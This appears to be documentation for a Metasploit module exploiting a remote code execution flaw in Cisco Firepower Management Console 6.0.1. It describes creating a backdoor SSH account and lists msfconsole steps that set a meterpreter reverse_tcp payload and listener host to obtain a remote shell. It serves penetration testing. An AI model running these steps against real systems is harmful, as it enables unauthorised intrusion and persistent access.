743 B
743 B
This module exploits a vulnerability in Cisco Firepower Management Console RCE. It will create a backdoor SSH account via HTTPS, and then obtain a native payload session in SSH.
Vulnerable Application
This exploit was specifically written against 6.0.1 (build 1213). To test, you can find the virtual appliance here:
Verification Steps
- Start msfconsole
use exploit/linux/http/cisco_firepower_useraddset password [https console password for admin]set rhost [IP]set payload linux/x86/meterpreter/reverse_tcpset lhost [IP]exploit- You should get a session